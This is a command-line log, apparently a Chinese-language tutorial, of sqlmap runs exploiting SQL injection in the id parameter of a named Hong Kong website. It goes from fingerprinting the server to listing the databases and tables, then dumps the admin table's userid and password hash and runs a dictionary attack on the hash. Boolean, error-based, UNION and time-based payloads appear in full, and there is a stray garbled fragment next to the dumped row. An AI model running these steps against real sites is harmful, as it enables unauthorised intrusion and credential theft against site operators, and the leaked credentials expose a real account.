D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* 注解:获取当前用户名称
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /*当前数据库
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
0 P5 h$ \) O6 L! S| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>